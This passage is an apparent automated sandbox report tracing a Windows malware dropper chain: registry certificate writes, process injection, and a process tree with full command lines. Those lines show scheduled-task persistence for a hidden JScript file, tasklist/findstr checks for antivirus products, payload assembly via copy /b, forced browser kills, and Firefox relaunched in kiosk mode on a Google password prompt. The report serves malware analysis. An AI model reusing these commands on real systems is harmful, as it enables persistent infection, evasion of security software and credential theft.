Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\a01c94d9d9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\a01c94d9d9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1520 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1520 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1520 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1520 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2876 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2876 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2876 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2876 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2876 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2876 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2876 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 3020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp
PID 3020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp
PID 3020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp
PID 3020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp
PID 3020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp
PID 3020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp
PID 3020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp
PID 2460 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 2460 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 2460 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 2460 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 2460 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 2460 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 2460 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 2460 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 832 wrote to memory of 1976 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 832 wrote to memory of 1976 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 832 wrote to memory of 1976 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 832 wrote to memory of 1976 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2876 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2876 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2876 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2876 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 1516 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 1516 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 1516 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 1516 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1732 wrote to memory of 1368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1732 wrote to memory of 1368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1732 wrote to memory of 1368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1732 wrote to memory of 2036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1732 wrote to memory of 2036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1732 wrote to memory of 2036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1732 wrote to memory of 2036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1732 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1732 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1732 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1732 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1732 wrote to memory of 2504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1732 wrote to memory of 2504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1732 wrote to memory of 2504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1732 wrote to memory of 2504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1732 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 1732 wrote to memory of 1544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe

"C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe

"C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"

C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp

"C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp" /SL5="$F0154,3291517,54272,C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause raf_encoder_1252

C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe

"C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe" -i

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause raf_encoder_1252

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 491505

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B

C:\Users\Admin\AppData\Local\Temp\491505\Dr.com

Dr.com B

C:\Windows\SysWOW64\choice.exe

choice /d y /t 15

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe

"C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe"

C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe

"C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe"

C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe

"C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe"

C:\Users\Admin\AppData\Local\Temp\1012582001\a01c94d9d9.exe

"C:\Users\Admin\AppData\Local\Temp\1012582001\a01c94d9d9.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1048.0.346891089\914119585" -parentBuildID 20221007134813 -prefsHandle 1160 -prefMapHandle 1152 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {556db0af-af43-4032-8f69-8c2bf39c93dc} 1048 "\\.\pipe\gecko-crash-server-pipe.1048" 1236 fdd4b58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1048.1.17016970\2111263013" -parentBuildID 20221007134813 -prefsHandle 1500 -prefMapHandle 1480 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {97079259-12da-431d-8855-9c8d2e1cdc60} 1048 "\\.\pipe\gecko-crash-server-pipe.1048" 1512 ebec458 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1048.2.701283415\8026146" -childID 1 -isForBrowser -prefsHandle 1828 -prefMapHandle 1824 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6713a323-2273-4011-a375-5297a28f1bc0} 1048 "\\.\pipe\gecko-crash-server-pipe.1048" 1852 18354358 tab

C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe

"C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1048.3.1202726128\22330463" -childID 2 -isForBrowser -prefsHandle 2900 -prefMapHandle 2896 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f480303-384f-4fa4-aaf8-c56307d20e3c} 1048 "\\.\pipe\gecko-crash-server-pipe.1048" 2912 1d26aa58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1048.4.1299394667\2076945187" -childID 3 -isForBrowser -prefsHandle 3700 -prefMapHandle 3692 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ffb5211-9e15-4e35-9483-504510607415} 1048 "\\.\pipe\gecko-crash-server-pipe.1048" 3708 1f45fa58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1048.5.631718763\1001044201" -childID 4 -isForBrowser -prefsHandle 3828 -prefMapHandle 3832 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e891a749-537a-427a-9254-2230791ba30e} 1048 "\\.\pipe\gecko-crash-server-pipe.1048" 3816 1f820b58 tab
